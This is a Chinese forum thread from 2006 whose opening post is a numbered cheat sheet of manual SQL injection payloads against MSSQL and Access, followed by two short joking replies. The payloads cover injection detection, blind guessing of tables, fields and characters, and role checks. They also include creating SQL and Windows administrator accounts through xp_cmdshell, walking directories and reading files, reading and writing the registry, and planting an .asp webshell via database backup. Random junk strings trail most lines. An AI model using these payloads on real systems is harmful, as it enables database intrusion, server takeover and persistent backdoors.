社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3300阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 T]6c9_  
  2.初步判断是否是mssql ;and user>0 nheU~jb  
"P'&+dH8  
  3.注入参数是字符'and [查询条件] and ''=' e:J'&r& 1  
l^!A  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' -#wVtXaSc  
 oKYhE  
  5.判断数据库系统 aw/7Z`   
@mx$sNDkL  
  ;and (select count(*) from sysobjects)>0 mssql \$'m ^tVU  
7y)=#ZG'R  
  ;and (select count(*) from msysobjects)>0 access *1W, M zg  
tP`G]BCbt  
QM ZUt  
'}Wu3X  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 +lW}ixt  
adI!W-/R:  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 $% Ci8p  
gr>o E#7  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 (]Ye[j^"7  
WBr:|F+~s  
  9.(1)猜字段的ascii值(access) 9$+^"ilk  
K3rBl!7v  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 )Ig+uDGk  
u`Z0{d  
  (2)猜字段的ascii值(mssql) zr.+'  
nuSN)}b<Q  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 -XVEV  
U|J$?aFDr  
  10.测试权限结构(mssql) 5fu+rU-#  
,\lY Px\P[  
"Ap$ Jl B  
vm\wO._  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 9q1HSJ1)  
5wH54g j}  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ]3t1=+  
]$~Fzs  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- _ktK+8*6`  
+ UK%t>E8  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Q(|PZn g  
o)%-l4S  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 2W3NL|P  
~=:2~$gsn  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- !%c{+]g  
K`QOU-M@}  
  ;and 1=(select IS_MEMBER('db_owner'));-- [DZqCo  
DS:>/m>)  
b4Z`y8=  
 R"U/RS  
  11.添加mssql和系统的帐户 F qeV3 N  
Zc'|!pT _  
  ;exec master.dbo.sp_addlogin username;-- v2hZq-q  
  ;exec master.dbo.sp_password null,username,password;-- *jM_wwG  
\3Dk5cSDk+  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- gA~20LSt  
K(nS$x1G  
  ;exec master.dbo.xp_cmdshell 'net user username password M{?zvq?d  
DX}B0B  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- TGU:(J'^  
4\LZD{  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- rv9B}%e  
3CR@' qG-  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ;,1=zhKU.  
4_PCq Ep)  
pOC% oj  
f64(a\Rw!^  
  12.(1)遍历目录 M1oPOC\0.  
$hkq>i \  
  ;create table dirs(paths varchar(100), id int) +|y*}bG  
|K L')&"  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' XE_ir Et  
?y ~TCqV  
  ;and (select top 1 paths from dirs)>0 I=K!)X$  
NO-k-  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 'lJEHz\  
'X7%35Y  
{5^K Xj$B  
\6{krn|  
  (2)遍历目录 lVPOYl%  
9G0D3F  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- s\[LpLt  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 KZ=u54  
&V'519vmoZ  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 CuH2E>wz  
!fY7"E{%%  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ypx: )e"/  
HTmI1  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ^Ye\u1n4  
GCDwWCxh  
Sw~(uH_l  
^ eQFg>  
  13.mssql中的存储过程 |% z ^N*  
f-;$0mTQ  
  xp_regenumvalues 注册表根键, 子键 0n Y6A~  
{esJ=FV\  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 U{6oLqwq3Y  
`@[l\.Vt:  
  xp_regread 根键,子键,键值名 ]r4bRK[1  
qO-9 x0v#  
  ;exec xp_regread X) V7bVW  
[4sEVu}  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 y$X(S\W  
(n,u|}8Y  
  xp_regwrite 根键,子键, 值名, 值类型, 值 4({( i  
C{ EAmv'  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 oM!xz1kVL  
:.k ZR;  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 07V8;A<,  
,7W:fwdR  
  xp_regdeletevalue 根键,子键,值名 {( #zcK  
bu>qsU3  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 $B;_Jo\|  
NzQ9Z1Mxy  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 : [q0S@  
'OwyyPBF  
MtS3p>4  
v2Bzx/F:  
  14.mssql的backup创建webshell dBSbu=^$)  
 v,=v  
  use model G8nrdN-9  
.`jo/,?+O  
  create table cmd(str image); z-dFDtiA  
-w1@!Sdd  
  insert into cmd(str) values (''); J'b<z.OW  
> _ <'D  
  backup database model to disk='c:\l.asp'; @@@=}!<H=  
=pcF:D#+  
&?0:v`4Y  
s,6`RI%  
  15.mssql内置函数 y}FZD?"  
)KE [!ofD  
  ;and (select @@version)>0 获得Windows的版本号 |?d#eQ9a  
#sTEQjJ,J  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa 5 c5oSy+  
pd3,pQ  
  ;and (select user_name())>0 爆当前系统的连接用户 Y4E/?37j  
> @_im6  
  ;and (select db_name())>0 得到当前连接的数据库 UDy(dn>J:J  
W3r?7!~  
Kv37s0|g  
g:7,~}_}^  
  16.简洁的webshell j~E",7Q'  
20b<68h$:  
  use model Fk "Ee&H)(  
~ Vw9  
  create table cmd(str image); RBwO+J53y  
]}Z4P-"t  
  insert into cmd(str) values (''); ST5V!jz  
-#In;~  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
欢迎提供真实交流,考虑发帖者的感受
认证码:
验证问题:
10+5=?,请输入中文答案:十五